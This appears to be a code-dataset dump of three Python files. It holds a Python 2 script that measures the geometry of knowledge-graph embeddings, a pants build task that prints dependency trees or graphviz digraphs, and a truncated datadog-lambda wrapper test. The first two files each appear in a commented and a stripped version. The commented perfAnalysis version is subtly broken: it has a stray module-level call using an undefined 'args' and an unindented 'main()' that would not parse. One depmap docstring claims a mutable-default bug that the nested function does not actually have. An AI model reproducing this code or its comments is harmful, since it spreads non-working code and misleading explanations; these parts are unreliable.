2021-05-03T07:17:48.000Z
|
perfAnalysis.py
|
malllabiisc/kg-geometry
|
d5b40d6795085109da5438cdc1d83d32fd5fc373
|
[
"Apache-2.0"
] | 2
|
2018-07-01T08:53:06.000Z
|
2018-12-12T05:15:40.000Z
|
import sys
import os
import argparse
import cPickle as pickle
from ConfigParser import ConfigParser as ConfigParser
from itertools import product
import numpy as np
from sklearn.decomposition import PCA
from matplotlib import pyplot as plt
from matplotlib.legend_handler import HandlerLine2D
from sklearn.manifold import TSNE
import scipy.stats as scistats
from stats import Stats
from model import Model
from triples import Triples
from util import *
from analysis import Analyser
from typeAnalysis import best_methods, uniform_methods
def getParser():
    """Build the command line parser for the performance analysis script.

    Required flags: -g/--geometry, -p/--perffile, -o/--opdir.  All others
    carry defaults (shown in --help via ArgumentDefaultsHelpFormatter).

    Cleanup: the original carried five commented-out argument definitions
    from an earlier revision; dead code removed.
    """
    parser = argparse.ArgumentParser(description="parser for arguments", formatter_class=argparse.ArgumentDefaultsHelpFormatter)
    parser.add_argument("-m", "--mdir", type=str, help="directory containing the models", default="./data")
    parser.add_argument("-d", "--dataname", type=str, help="dataset name", default="fb15k")
    parser.add_argument("-t", "--type", type=str, help="vector type [ent/rel]", default="ent")
    parser.add_argument("-g", "--geometry", type=str, help="geometry feature[length/conicity]", required=True)
    parser.add_argument("-p", "--perffile", type=str, help="files containing model performances", required=True)
    parser.add_argument("-o", "--opdir", type=str, help="output directory", required=True)
    parser.add_argument("--result", dest="result", help="true for plotting existing results", action="store_true")
    parser.set_defaults(result=False)
    return parser
def readPerfs(filename):
    """Read a tab-separated model performance file into a nested dict.

    Each non-empty line holds: method, dim, nneg, MR, MRR, HITS@10.
    HITS@10 values given as fractions (< 1) are rescaled to percentages.
    Returns perfs[dim][nneg][method] -> {"mr", "mrr", "hits_10"}.
    """
    perfs = {}
    with open(filename, "r") as fin:
        for raw in fin:
            raw = raw.strip()
            if not raw:
                continue
            fields = raw.split("\t")
            method = fields[0].lower()
            dim = int(fields[1])
            nneg = int(fields[2])
            hits = np.float32(fields[5])
            if hits < 1:
                hits = 100 * hits
            perfs.setdefault(dim, {}).setdefault(nneg, {})[method] = {
                "mr": np.float32(fields[3]),
                "mrr": np.float32(fields[4]),
                "hits_10": hits,
            }
    return perfs
def perfAnalysis(args):
    # Python 2 module (uses `print` statements and cPickle) -- keep py2
    # syntax when touching this file.
    #
    # Two modes:
    #   * default: for every (dim, nneg, method) combination, load the model
    #     via Analyser and compute either vector lengths or conicity (mean
    #     normalized inner products), then pickle the aggregate results into
    #     opdir/<geometry>/<type>.<dataname>.p
    #   * --result: load that pickle (plus the perf file) and plot
    #     geometry-vs-performance via plotConePerf.
    #self.cfg = ConfigParser()
    #self.cfg.read(args.cfgFile)
    methods = ['transe', 'transr', 'stranse', 'distmult', 'hole', 'complex']
    nnegs = [1, 50, 100]
    dims = [50, 100]
    mean_products = {}
    name_conicity = {}
    useEnt = True
    if not args.result:
        for dim in dims:
            for nneg in nnegs:
                for method in methods:
                    # Model/data file names follow the convention
                    # <dataname>.<method>.n<nneg>.d<dim>.p / <dataname>.<method>.bin
                    modelfile = "%s.%s.n%d.d%d.p" %(args.dataname, method, nneg, dim)
                    modelfile = os.path.join(args.mdir, modelfile)
                    datafile = "%s.%s.bin" % (args.dataname, method)
                    datafile = os.path.join(args.mdir, datafile)
                    analyser = Analyser(datafile, modelfile, usePR=False)
                    #nSamples = 100
                    #eRanges = [((0,100), nSamples), ((100,500), nSamples), ((500,5000), nSamples), ((5000, analyser.t.ne), nSamples)]
                    #entIndices = analyser.getEntIdxs(eRanges)
                    if args.type in ['ent']:
                        # Entity vectors: sample frequency-band ranges up to
                        # the total entity count.
                        nSamples = 100
                        ranges = [((0,100), nSamples), ((100,500), nSamples), ((500,5000), nSamples), ((5000, analyser.t.ne), nSamples)]
                        indices = analyser.getEntIdxs(ranges)
                        useEnt = True
                    else:
                        # Relation vectors: wn18 has too few relations for
                        # the generic bands, so it gets bespoke ranges.
                        nSamples = 100
                        if args.dataname in ['wn18']:
                            ranges = [((0,3), 3), ((3,10), 7), ((10,analyser.t.nr), analyser.t.nr-10)]
                        else:
                            ranges = [((0,100), nSamples), ((100,500), nSamples), ((500,analyser.t.nr), nSamples)]
                        indices = analyser.getRelIdxs(ranges)
                        useEnt = False
                    legendLabels=[]
                    for a,b in ranges:
                        curLabel = "%d-%d"%(a[0],a[1])
                        legendLabels.append(curLabel)
                    if args.geometry in ['length']:
                        gp, mgp = analyser.getLengths(indices, ent=useEnt)
                    else:
                        gp, mgp = analyser.getInnerProducts(indices, sampleMean=True, ent=useEnt, normalized=True)
                    print "%s\tneg %d" % (method,nneg)
                    print mgp
                    # mgp[-1] is the aggregate over all sampled indices --
                    # TODO confirm against Analyser.
                    mean_products.setdefault(dim, {}).setdefault(nneg, {})[method] = np.array(mgp, dtype=np.float32)
                    mname = "%s.%s.n%d.d%d" % (args.dataname, method, nneg, dim)
                    name_conicity[mname] = mgp[-1]
        outputfile = os.path.join(args.opdir, args.geometry, "%s.%s"%(args.type, args.dataname))
        with open(outputfile+".p", "wb") as fout:
            pickle.dump({"mean_products":mean_products, "methods":methods, "nnegs":nnegs, "dims":dims, "name_conicity":name_conicity}, fout)
            #pickle.dump({"mean_products":mean_products, "mean_products_list":mean_products_list, "methods":methods, "nnegs":nnegs, "dim":dim}, fout)
    else:
        # Plotting mode: reload previously computed geometry results.
        outputfile = os.path.join(args.opdir, args.geometry, "%s.%s"%(args.type, args.dataname))
        with open(outputfile+".p", "rb") as fin:
            result = pickle.load(fin)
        if "perfs" not in result:
            with open(args.perffile, "rb") as fin:
                """
                mean_products = pickle.load(fin)
                mean_products_list = []
                for nneg in nnegs:
                    cur_products_list = []
                    for method in methods:
                        cur_products_list.append(np.float32(mean_products[nneg][method][-1]))
                    mean_products_list.append(cur_products_list)
                """
                result['perfs'] = pickle.load(fin)
        #perfs = readPerfs(args.perffile)
        # Whitelist limits which (method, nneg, dim) curves are plotted.
        # NOTE(review): the trailing `elif dim == 100` inside the transr
        # branch is nested under `if nneg == 1` and looks like a leftover --
        # confirm the intended filter.
        whitelist = []
        for method, nneg, dim in product(result['methods'], result['nnegs'], result['dims']):
            if dim == 100:
                if method in ['hole', 'complex', 'distmult']:
                    whitelist.append("%s.n%d.d%d"%(method, nneg, dim))
                elif method in ['transe', 'stranse'] and nneg in [1]:
                    whitelist.append("%s.n%d.d%d"%(method, nneg, dim))
                elif method in ['transr']:
                    if nneg == 1:
                        whitelist.append("%s.n%d.d%d"%(method, nneg, dim))
                    elif dim == 100:
                        whitelist.append("%s.n%d.d%d"%(method, nneg, dim))
        if args.geometry in ['length']:
            plotConePerf(methods, nnegs, dims, result, outputfile, xlabel="length", whitelist=whitelist, show=True)
        else:
            plotConePerf(methods, nnegs, dims, result, outputfile, xlabel="conicity", whitelist=whitelist, show=True)
def main():
    """Entry point: parse CLI arguments and run the analysis."""
    parser = getParser()
    try:
        args = parser.parse_args()
    except SystemExit:
        # argparse exits via SystemExit on bad/missing arguments; re-print
        # the full help and exit with status 1.  (The original used a bare
        # `except:`, which also swallowed KeyboardInterrupt and real bugs.)
        parser.print_help()
        sys.exit(1)
    perfAnalysis(args)
perfAnalysis(args)
if __name__ == "__main__":
main()
| 48.548387
| 149
| 0.561063
|
import sys
import os
import argparse
import cPickle as pickle
from ConfigParser import ConfigParser as ConfigParser
from itertools import product
import numpy as np
from sklearn.decomposition import PCA
from matplotlib import pyplot as plt
from matplotlib.legend_handler import HandlerLine2D
from sklearn.manifold import TSNE
import scipy.stats as scistats
from stats import Stats
from model import Model
from triples import Triples
from util import *
from analysis import Analyser
from typeAnalysis import best_methods, uniform_methods
def getParser():
parser = argparse.ArgumentParser(description="parser for arguments", formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("-m", "--mdir", type=str, help="directory containing the models", default="./data")
parser.add_argument("-d", "--dataname", type=str, help="dataset name", default="fb15k")
parser.add_argument("-t", "--type", type=str, help="vector type [ent/rel]", default="ent")
parser.add_argument("-g", "--geometry", type=str, help="geometry feature[length/conicity]", required=True)
parser.add_argument("-p", "--perffile", type=str, help="files containing model performances", required=True)
parser.add_argument("-o", "--opdir", type=str, help="output directory", required=True)
parser.add_argument("--result", dest="result", help="true for plotting existing results", action="store_true")
parser.set_defaults(result=False)
return parser
def readPerfs(filename):
perfs = {}
delimiter = "\t"
with open(filename, "r") as fin:
for line in fin:
line = line.strip()
if line:
x = line.split(delimiter)
dim = int(x[1])
nneg = int(x[2])
method = x[0].lower()
hits_10 = np.float32(x[5])
if hits_10 < 1:
hits_10 = 100*hits_10
perf = {"mr":np.float32(x[3]), "mrr":np.float32(x[4]), "hits_10":hits_10}
perfs.setdefault(dim, {}).setdefault(nneg, {})[method] = perf
return perfs
def perfAnalysis(args):
methods = ['transe', 'transr', 'stranse', 'distmult', 'hole', 'complex']
nnegs = [1, 50, 100]
dims = [50, 100]
mean_products = {}
name_conicity = {}
useEnt = True
if not args.result:
for dim in dims:
for nneg in nnegs:
for method in methods:
modelfile = "%s.%s.n%d.d%d.p" %(args.dataname, method, nneg, dim)
modelfile = os.path.join(args.mdir, modelfile)
datafile = "%s.%s.bin" % (args.dataname, method)
datafile = os.path.join(args.mdir, datafile)
analyser = Analyser(datafile, modelfile, usePR=False)
if args.type in ['ent']:
nSamples = 100
ranges = [((0,100), nSamples), ((100,500), nSamples), ((500,5000), nSamples), ((5000, analyser.t.ne), nSamples)]
indices = analyser.getEntIdxs(ranges)
useEnt = True
else:
nSamples = 100
if args.dataname in ['wn18']:
ranges = [((0,3), 3), ((3,10), 7), ((10,analyser.t.nr), analyser.t.nr-10)]
else:
ranges = [((0,100), nSamples), ((100,500), nSamples), ((500,analyser.t.nr), nSamples)]
indices = analyser.getRelIdxs(ranges)
useEnt = False
legendLabels=[]
for a,b in ranges:
curLabel = "%d-%d"%(a[0],a[1])
legendLabels.append(curLabel)
if args.geometry in ['length']:
gp, mgp = analyser.getLengths(indices, ent=useEnt)
else:
gp, mgp = analyser.getInnerProducts(indices, sampleMean=True, ent=useEnt, normalized=True)
print "%s\tneg %d" % (method,nneg)
print mgp
mean_products.setdefault(dim, {}).setdefault(nneg, {})[method] = np.array(mgp, dtype=np.float32)
mname = "%s.%s.n%d.d%d" % (args.dataname, method, nneg, dim)
name_conicity[mname] = mgp[-1]
outputfile = os.path.join(args.opdir, args.geometry, "%s.%s"%(args.type, args.dataname))
with open(outputfile+".p", "wb") as fout:
pickle.dump({"mean_products":mean_products, "methods":methods, "nnegs":nnegs, "dims":dims, "name_conicity":name_conicity}, fout)
else:
outputfile = os.path.join(args.opdir, args.geometry, "%s.%s"%(args.type, args.dataname))
with open(outputfile+".p", "rb") as fin:
result = pickle.load(fin)
if "perfs" not in result:
with open(args.perffile, "rb") as fin:
"""
mean_products = pickle.load(fin)
mean_products_list = []
for nneg in nnegs:
cur_products_list = []
for method in methods:
cur_products_list.append(np.float32(mean_products[nneg][method][-1]))
mean_products_list.append(cur_products_list)
"""
result['perfs'] = pickle.load(fin)
whitelist = []
for method, nneg, dim in product(result['methods'], result['nnegs'], result['dims']):
if dim == 100:
if method in ['hole', 'complex', 'distmult']:
whitelist.append("%s.n%d.d%d"%(method, nneg, dim))
elif method in ['transe', 'stranse'] and nneg in [1]:
whitelist.append("%s.n%d.d%d"%(method, nneg, dim))
elif method in ['transr']:
if nneg == 1:
whitelist.append("%s.n%d.d%d"%(method, nneg, dim))
elif dim == 100:
whitelist.append("%s.n%d.d%d"%(method, nneg, dim))
if args.geometry in ['length']:
plotConePerf(methods, nnegs, dims, result, outputfile, xlabel="length", whitelist=whitelist, show=True)
else:
plotConePerf(methods, nnegs, dims, result, outputfile, xlabel="conicity", whitelist=whitelist, show=True)
def main():
parser = getParser()
try:
args = parser.parse_args()
except:
parser.print_help()
sys.exit(1)
perfAnalysis(args)
if __name__ == "__main__":
main()
| false
| true
|
f71900153bd1b94d6b9815bcc58db5cfd55c8cd4
| 8,530
|
py
|
Python
|
src/python/twitter/pants/tasks/depmap.py
|
wfarner/commons
|
42988a7a49f012665174538cca53604c7846ee86
|
[
"Apache-2.0"
] | 1
|
2019-12-20T14:13:27.000Z
|
2019-12-20T14:13:27.000Z
|
src/python/twitter/pants/tasks/depmap.py
|
wfarner/commons
|
42988a7a49f012665174538cca53604c7846ee86
|
[
"Apache-2.0"
] | null | null | null |
src/python/twitter/pants/tasks/depmap.py
|
wfarner/commons
|
42988a7a49f012665174538cca53604c7846ee86
|
[
"Apache-2.0"
] | 1
|
2019-12-20T14:13:29.000Z
|
2019-12-20T14:13:29.000Z
|
# ==================================================================================================
# Copyright 2011 Twitter, Inc.
# --------------------------------------------------------------------------------------------------
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this work except in compliance with the License.
# You may obtain a copy of the License in the LICENSE file, or at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==================================================================================================
from __future__ import print_function
from twitter.pants.tasks.console_task import ConsoleTask
from twitter.pants.tasks import TaskError
from twitter.pants import is_jvm, is_jvm_app, is_python, is_concrete
from twitter.pants.targets.jar_dependency import JarDependency
class Depmap(ConsoleTask):
  """Generates either a textual dependency tree or a graphviz digraph dot file for the dependency
  set of a target.
  """
  @staticmethod
  def _is_jvm(dep):
    # JVM-style targets (plain JVM or JVM app bundles) are the only kinds
    # this task knows how to walk.
    return is_jvm(dep) or is_jvm_app(dep)
  @classmethod
  def setup_parser(cls, option_group, args, mkflags):
    """Register the depmap command line flags."""
    super(Depmap, cls).setup_parser(option_group, args, mkflags)
    # Stashed on the class so __init__ can name the flags in its
    # mutual-exclusion error message.
    cls.internal_only_flag = mkflags("internal-only")
    cls.external_only_flag = mkflags("external-only")
    option_group.add_option(cls.internal_only_flag,
                            action="store_true",
                            dest="depmap_is_internal_only",
                            default=False,
                            help='Specifies that only internal dependencies should'
                                 ' be included in the graph output (no external jars).')
    option_group.add_option(cls.external_only_flag,
                            action="store_true",
                            dest="depmap_is_external_only",
                            default=False,
                            help='Specifies that only external dependencies should'
                                 ' be included in the graph output (only external jars).')
    option_group.add_option(mkflags("minimal"),
                            action="store_true",
                            dest="depmap_is_minimal",
                            default=False,
                            help='For a textual dependency tree, only prints a dependency the 1st'
                                 ' time it is encountered. For graph output this does nothing.')
    option_group.add_option(mkflags("separator"),
                            dest="depmap_separator",
                            default="-",
                            help='Specifies the separator to use between the org/name/rev'
                                 ' components of a dependency\'s fully qualified name.')
    option_group.add_option(mkflags("graph"),
                            action="store_true",
                            dest="depmap_is_graph",
                            default=False,
                            help='Specifies the internal dependency graph should be'
                                 ' output in the dot digraph format')
  def __init__(self, context):
    """Validates the mutually exclusive internal/external flags and caches
    the option values on the instance."""
    ConsoleTask.__init__(self, context)
    if (self.context.options.depmap_is_internal_only
        and self.context.options.depmap_is_external_only):
      cls = self.__class__
      error_str = "At most one of %s or %s can be selected." % (cls.internal_only_flag,
                                                                cls.external_only_flag)
      raise TaskError(error_str)
    self.is_internal_only = self.context.options.depmap_is_internal_only
    self.is_external_only = self.context.options.depmap_is_external_only
    self.is_minimal = self.context.options.depmap_is_minimal
    self.is_graph = self.context.options.depmap_is_graph
    self.separator = self.context.options.depmap_separator
  def console_output(self, targets):
    """Emit either the dot digraph or the textual tree for each target root.

    Only JVM targets are supported; Python and other target types raise
    TaskError.  NOTE(review): the return inside the loop means only the
    first target root is ever rendered -- confirm whether that is intended.
    """
    if len(self.context.target_roots) == 0:
      raise TaskError("One or more target addresses are required.")
    for target in self.context.target_roots:
      if all(self._is_jvm(t) for t in target.resolve() if is_concrete(t)):
        if self.is_graph:
          return self._output_digraph(target)
        else:
          return self._output_dependency_tree(target)
      elif is_python(target):
        raise TaskError('Unsupported for Python targets')
      else:
        raise TaskError('Unsupported for target %s' % target)
  def _dep_id(self, dependency):
    """Returns a tuple of dependency_id , is_internal_dep."""
    params = dict(sep=self.separator)
    if isinstance(dependency, JarDependency):
      params.update(org=dependency.org, name=dependency.name, rev=dependency.rev)
    else:
      # Non-jar targets are internal; their id is namespaced under "internal".
      params.update(org='internal', name=dependency.id)
    # A rev is only present for external jars, so its presence drives the
    # is_internal flag.
    if params.get('rev'):
      return "%(org)s%(sep)s%(name)s%(sep)s%(rev)s" % params, False
    else:
      return "%(org)s%(sep)s%(name)s" % params, True
  def _output_dependency_tree(self, target):
    """Render *target*'s dependencies as an indented text tree (list of lines)."""
    def output_dep(dep, indent):
      return "%s%s" % (indent * "  ", dep)
    # `outputted` uses the mutable-default trick to share the seen-set across
    # recursive calls; the nested def is re-evaluated per _output_dependency_tree
    # call, so the set is fresh for each top-level invocation.
    def output_deps(dep, indent=0, outputted=set()):
      dep_id, _ = self._dep_id(dep)
      if dep_id in outputted:
        # Repeat visits are marked with "*" unless --minimal suppresses them.
        return [output_dep("*%s" % dep_id, indent)] if not self.is_minimal else []
      else:
        output = []
        if not self.is_external_only:
          output += [output_dep(dep_id, indent)]
          outputted.add(dep_id)
          indent += 1
        if self._is_jvm(dep):
          for internal_dep in dep.internal_dependencies:
            output += output_deps(internal_dep, indent, outputted)
        if not self.is_internal_only:
          if self._is_jvm(dep):
            for jar_dep in dep.jar_dependencies:
              jar_dep_id, internal = self._dep_id(jar_dep)
              if not internal:
                if jar_dep_id not in outputted or (not self.is_minimal
                                                   and not self.is_external_only):
                  output += [output_dep(jar_dep_id, indent)]
                  outputted.add(jar_dep_id)
        return output
    return [dependency for t in target.resolve() for dependency in output_deps(t)]
  def _output_digraph(self, target):
    """Render *target*'s dependency graph as graphviz dot source (list of lines)."""
    def output_candidate(internal):
      # A node/edge is emitted when its internal/external kind matches the
      # selected filter (or no filter is active).
      return ((self.is_internal_only and internal)
              or (self.is_external_only and not internal)
              or (not self.is_internal_only and not self.is_external_only))
    def output_dep(dep):
      # Node styling: internal deps get the filled blue style, Twitter jars
      # the light-blue fill, everything else default.
      dep_id, internal = self._dep_id(dep)
      science_styled = internal and not self.is_internal_only
      twitter_styled = not internal and dep.org.startswith('com.twitter')
      if science_styled:
        fmt = '  "%(id)s" [label="%(id)s", style="filled", fillcolor="#0084b4", fontcolor="white"];'
        return fmt % {'id': dep_id}
      elif twitter_styled:
        return '  "%s" [style="filled", fillcolor="#c0deed"];' % dep_id
      else:
        return '  "%s";' % dep_id
    def output_deps(outputted, dep):
      # `outputted` doubles as the seen-set for nodes AND for (from, to)
      # edge tuples, preventing duplicate lines.
      output = []
      if dep not in outputted:
        outputted.add(dep)
        for dependency in dep.resolve():
          if self._is_jvm(dependency):
            for internal_dependency in dependency.internal_dependencies:
              output += output_deps(outputted, internal_dependency)
          for jar in (dependency.jar_dependencies if self._is_jvm(dependency) else [dependency]):
            jar_id, internal = self._dep_id(jar)
            if output_candidate(internal):
              if jar not in outputted:
                output += [output_dep(jar)]
                outputted.add(jar)
              target_id, _ = self._dep_id(target)
              dep_id, _ = self._dep_id(dependency)
              # With --external-only all edges are drawn from the root
              # target; otherwise from the immediate dependent.
              left_id = target_id if self.is_external_only else dep_id
              if (left_id, jar_id) not in outputted:
                styled = internal and not self.is_internal_only
                output += ['  "%s" -> "%s"%s;' % (left_id, jar_id,
                                                  ' [style="dashed"]' if styled else '')]
                outputted.add((left_id, jar_id))
      return output
    return ['digraph "%s" {' % target.id, output_dep(target)] + output_deps(set(), target) + ['}']
| 43.520408
| 100
| 0.59027
|
from __future__ import print_function
from twitter.pants.tasks.console_task import ConsoleTask
from twitter.pants.tasks import TaskError
from twitter.pants import is_jvm, is_jvm_app, is_python, is_concrete
from twitter.pants.targets.jar_dependency import JarDependency
class Depmap(ConsoleTask):
  """Prints either a textual dependency tree or a graphviz digraph of the
  dependencies of one or more jvm targets.

  BUGFIX: the textual tree previously accumulated its "already printed" ids in
  a mutable default argument (``outputted=set()``), which Python evaluates once
  at function-definition time.  The set therefore leaked across invocations of
  ``_output_dependency_tree``, so a second run would mark everything as already
  seen.  The accumulator is now created per invocation and threaded through.
  """

  @staticmethod
  def _is_jvm(dep):
    # jvm apps wrap jvm targets and expose the same dependency surface.
    return is_jvm(dep) or is_jvm_app(dep)

  @classmethod
  def setup_parser(cls, option_group, args, mkflags):
    super(Depmap, cls).setup_parser(option_group, args, mkflags)

    cls.internal_only_flag = mkflags("internal-only")
    cls.external_only_flag = mkflags("external-only")
    option_group.add_option(cls.internal_only_flag,
                            action="store_true",
                            dest="depmap_is_internal_only",
                            default=False,
                            help='Specifies that only internal dependencies should'
                                 ' be included in the graph output (no external jars).')
    option_group.add_option(cls.external_only_flag,
                            action="store_true",
                            dest="depmap_is_external_only",
                            default=False,
                            help='Specifies that only external dependencies should'
                                 ' be included in the graph output (only external jars).')
    option_group.add_option(mkflags("minimal"),
                            action="store_true",
                            dest="depmap_is_minimal",
                            default=False,
                            help='For a textual dependency tree, only prints a dependency the 1st'
                                 ' time it is encountered. For graph output this does nothing.')
    option_group.add_option(mkflags("separator"),
                            dest="depmap_separator",
                            default="-",
                            help='Specifies the separator to use between the org/name/rev'
                                 ' components of a dependency\'s fully qualified name.')
    option_group.add_option(mkflags("graph"),
                            action="store_true",
                            dest="depmap_is_graph",
                            default=False,
                            help='Specifies the internal dependency graph should be'
                                 ' output in the dot digraph format')

  def __init__(self, context):
    """Raises TaskError if --internal-only and --external-only are both set."""
    ConsoleTask.__init__(self, context)

    if (self.context.options.depmap_is_internal_only
        and self.context.options.depmap_is_external_only):
      cls = self.__class__
      error_str = "At most one of %s or %s can be selected." % (cls.internal_only_flag,
                                                                cls.external_only_flag)
      raise TaskError(error_str)

    # Cache the option values the output methods consult.
    self.is_internal_only = self.context.options.depmap_is_internal_only
    self.is_external_only = self.context.options.depmap_is_external_only
    self.is_minimal = self.context.options.depmap_is_minimal
    self.is_graph = self.context.options.depmap_is_graph
    self.separator = self.context.options.depmap_separator

  def console_output(self, targets):
    """Returns the lines to print for the first target root; jvm-only."""
    if len(self.context.target_roots) == 0:
      raise TaskError("One or more target addresses are required.")
    for target in self.context.target_roots:
      if all(self._is_jvm(t) for t in target.resolve() if is_concrete(t)):
        if self.is_graph:
          return self._output_digraph(target)
        else:
          return self._output_dependency_tree(target)
      elif is_python(target):
        raise TaskError('Unsupported for Python targets')
      else:
        raise TaskError('Unsupported for target %s' % target)

  def _dep_id(self, dependency):
    """Returns an (id, is_internal) pair for the given dependency.

    External jar dependencies carry a rev and get an org-name-rev id; anything
    else is treated as internal and keyed as 'internal'-<id>.
    """
    params = dict(sep=self.separator)
    if isinstance(dependency, JarDependency):
      params.update(org=dependency.org, name=dependency.name, rev=dependency.rev)
    else:
      params.update(org='internal', name=dependency.id)

    if params.get('rev'):
      return "%(org)s%(sep)s%(name)s%(sep)s%(rev)s" % params, False
    else:
      return "%(org)s%(sep)s%(name)s" % params, True

  def _output_dependency_tree(self, target):
    """Returns the lines of an indented textual dependency tree for target."""
    def output_dep(dep, indent):
      return "%s%s" % (indent * " ", dep)

    def output_deps(dep, outputted, indent=0):
      # `outputted` is the per-invocation set of already-printed dep ids;
      # it is created once in the enclosing call (see below), never as a
      # mutable default.
      dep_id, _ = self._dep_id(dep)
      if dep_id in outputted:
        # Re-printed deps are star-marked unless --minimal suppresses them.
        return [output_dep("*%s" % dep_id, indent)] if not self.is_minimal else []
      else:
        output = []
        if not self.is_external_only:
          output += [output_dep(dep_id, indent)]
          outputted.add(dep_id)
          indent += 1

        if self._is_jvm(dep):
          for internal_dep in dep.internal_dependencies:
            output += output_deps(internal_dep, outputted, indent)

        if not self.is_internal_only:
          if self._is_jvm(dep):
            for jar_dep in dep.jar_dependencies:
              jar_dep_id, internal = self._dep_id(jar_dep)
              if not internal:
                if jar_dep_id not in outputted or (not self.is_minimal
                                                   and not self.is_external_only):
                  output += [output_dep(jar_dep_id, indent)]
                  outputted.add(jar_dep_id)
        return output

    # One shared "seen" set per invocation keeps the original intra-call
    # de-duplication while avoiding state leaking across invocations.
    outputted = set()
    return [line for t in target.resolve() for line in output_deps(t, outputted)]

  def _output_digraph(self, target):
    """Returns the lines of a graphviz dot digraph for target's dependencies."""
    def output_candidate(internal):
      # Honors --internal-only / --external-only filtering.
      return ((self.is_internal_only and internal)
              or (self.is_external_only and not internal)
              or (not self.is_internal_only and not self.is_external_only))

    def output_dep(dep):
      dep_id, internal = self._dep_id(dep)
      science_styled = internal and not self.is_internal_only
      twitter_styled = not internal and dep.org.startswith('com.twitter')

      if science_styled:
        fmt = ' "%(id)s" [label="%(id)s", style="filled", fillcolor="#0084b4", fontcolor="white"];'
        return fmt % {'id': dep_id}
      elif twitter_styled:
        return ' "%s" [style="filled", fillcolor="#c0deed"];' % dep_id
      else:
        return ' "%s";' % dep_id

    def output_deps(outputted, dep):
      # `outputted` tracks both emitted nodes and emitted (left, right) edges.
      output = []

      if dep not in outputted:
        outputted.add(dep)
        for dependency in dep.resolve():
          if self._is_jvm(dependency):
            for internal_dependency in dependency.internal_dependencies:
              output += output_deps(outputted, internal_dependency)

          for jar in (dependency.jar_dependencies if self._is_jvm(dependency) else [dependency]):
            jar_id, internal = self._dep_id(jar)
            if output_candidate(internal):
              if jar not in outputted:
                output += [output_dep(jar)]
                outputted.add(jar)

              target_id, _ = self._dep_id(target)
              dep_id, _ = self._dep_id(dependency)
              # With --external-only all edges hang off the root target.
              left_id = target_id if self.is_external_only else dep_id
              if (left_id, jar_id) not in outputted:
                styled = internal and not self.is_internal_only
                output += [' "%s" -> "%s"%s;' % (left_id, jar_id,
                                                ' [style="dashed"]' if styled else '')]
                outputted.add((left_id, jar_id))
      return output

    return ['digraph "%s" {' % target.id, output_dep(target)] + output_deps(set(), target) + ['}']
| true
| true
|
f7190276ce7083fff4e92fe7957e9808976cfa88
| 15,748
|
py
|
Python
|
tests/test_wrapper.py
|
Neki/datadog-lambda-python
|
57cc2404b7d2d8ee5ff7791f41f0036aabd13d0c
|
[
"Apache-2.0"
] | null | null | null |
tests/test_wrapper.py
|
Neki/datadog-lambda-python
|
57cc2404b7d2d8ee5ff7791f41f0036aabd13d0c
|
[
"Apache-2.0"
] | null | null | null |
tests/test_wrapper.py
|
Neki/datadog-lambda-python
|
57cc2404b7d2d8ee5ff7791f41f0036aabd13d0c
|
[
"Apache-2.0"
] | null | null | null |
import os
import unittest
try:
from unittest.mock import patch, call, ANY, MagicMock
except ImportError:
from mock import patch, call, ANY, MagicMock
from datadog_lambda.wrapper import datadog_lambda_wrapper
from datadog_lambda.metric import lambda_metric
from datadog_lambda.thread_stats_writer import ThreadStatsWriter
def get_mock_context(
    aws_request_id="request-id-1",
    memory_limit_in_mb="256",
    invoked_function_arn="arn:aws:lambda:us-west-1:123457598159:function:python-layer-test:1",
    function_version="1",
    client_context=None,
):
    """Builds a MagicMock standing in for an AWS Lambda context object.

    The parameters mirror the attributes the wrapper reads off a real Lambda
    context; override any of them per test.  ``client_context`` previously
    used a mutable default (``{}``), which Python evaluates once at definition
    time and shares across every call — a test mutating it would bleed into
    other tests.  A ``None`` sentinel now yields a fresh dict per call while
    keeping the observable default value identical.
    """
    lambda_context = MagicMock()
    lambda_context.aws_request_id = aws_request_id
    lambda_context.memory_limit_in_mb = memory_limit_in_mb
    lambda_context.invoked_function_arn = invoked_function_arn
    lambda_context.function_version = function_version
    # Fresh empty dict per call; avoids the shared-mutable-default pitfall.
    lambda_context.client_context = {} if client_context is None else client_context
    return lambda_context
class TestDatadogLambdaWrapper(unittest.TestCase):
def setUp(self):
# Force @datadog_lambda_wrapper to always create a real
# (not no-op) wrapper.
datadog_lambda_wrapper._force_wrap = True
patcher = patch(
"datadog.threadstats.reporters.HttpReporter.flush_distributions"
)
self.mock_threadstats_flush_distributions = patcher.start()
self.addCleanup(patcher.stop)
patcher = patch("datadog_lambda.wrapper.extract_dd_trace_context")
self.mock_extract_dd_trace_context = patcher.start()
self.mock_extract_dd_trace_context.return_value = ({}, None)
self.addCleanup(patcher.stop)
patcher = patch("datadog_lambda.wrapper.set_correlation_ids")
self.mock_set_correlation_ids = patcher.start()
self.addCleanup(patcher.stop)
patcher = patch("datadog_lambda.wrapper.inject_correlation_ids")
self.mock_inject_correlation_ids = patcher.start()
self.addCleanup(patcher.stop)
patcher = patch("datadog_lambda.wrapper.patch_all")
self.mock_patch_all = patcher.start()
self.addCleanup(patcher.stop)
patcher = patch("datadog_lambda.cold_start.is_cold_start")
self.mock_is_cold_start = patcher.start()
self.mock_is_cold_start.return_value = True
self.addCleanup(patcher.stop)
patcher = patch("datadog_lambda.tags.python_version_tuple")
self.mock_python_version_tuple = patcher.start()
self.mock_python_version_tuple.return_value = ("2", "7", "10")
self.addCleanup(patcher.stop)
patcher = patch("datadog_lambda.metric.write_metric_point_to_stdout")
self.mock_write_metric_point_to_stdout = patcher.start()
self.addCleanup(patcher.stop)
patcher = patch("datadog_lambda.tags.get_library_version_tag")
self.mock_format_dd_lambda_layer_tag = patcher.start()
# Mock the layer version so we don't have to update tests on every version bump
self.mock_format_dd_lambda_layer_tag.return_value = "datadog_lambda:v6.6.6"
patcher = patch("datadog_lambda.tags._format_dd_lambda_layer_tag")
self.mock_format_dd_lambda_layer_tag = patcher.start()
# Mock the layer version so we don't have to update tests on every version bump
self.mock_format_dd_lambda_layer_tag.return_value = (
"dd_lambda_layer:datadog-python27_0.1.0"
)
self.addCleanup(patcher.stop)
def test_datadog_lambda_wrapper(self):
@datadog_lambda_wrapper
def lambda_handler(event, context):
lambda_metric("test.metric", 100)
lambda_event = {}
lambda_context = get_mock_context()
lambda_handler(lambda_event, lambda_context)
